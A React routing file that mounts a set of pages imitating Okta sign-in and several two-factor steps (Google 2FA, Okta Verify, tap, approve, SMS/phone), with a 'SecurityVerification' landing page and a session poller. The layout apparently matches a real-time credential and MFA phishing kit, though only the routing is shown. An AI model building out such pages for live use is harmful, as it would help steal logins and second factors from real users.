import { BrowserRouter as Router, Routes, Route, Navigate } from "react-router-dom";
import "./App.css";
import Login from "./Login";
import OktaLogin from "./OktaLogin";
import OktaGoogle2fa from "./OktaGoogle2fa";
import OktaVerify2fa from "./OktaVerify2fa";
import OktaTap from "./OktaTap";
import OktaApprove from "./OktaApprove";
import SecurityVerification from "./SecurityVerification";
import Email from "./Email";
import Twofa from "./Twofa";
import Phone from "./Phone";
import Tap from "./Tap";
import Confirmation from "./Confirmation";
import SessionPoller from "./SessionPoller";
import DocumentTitle from "./DocumentTitle";

function App() {
  return (
    <Router>
      <DocumentTitle />
      <SessionPoller />
      <Routes>
        <Route path="/login" element={<Login />} />
        <Route path="/okta-login" element={<OktaLogin />} />
        <Route path="/okta-google-2fa" element={<OktaGoogle2fa />} />
        <Route path="/okta-verify-2fa" element={<OktaVerify2fa />} />
        <Route path="/okta-tap" element={<OktaTap />} />
        <Route path="/okta-approve" element={<OktaApprove />} />
        <Route path="/" element={<SecurityVerification />} />
        <Route path="/email" element={<Email />} />
        <Route path="/2fa" element={<Twofa />} />
        <Route path="/sms" element={<Navigate to="/phone" replace />} />
        <Route path="/phone" element={<Phone />} />
        <Route path="/tap" element={<Tap />} />
        <Route path="/confirmation" element={<Confirmation />} />
      </Routes>
    </Router>
  );
}

export default App;
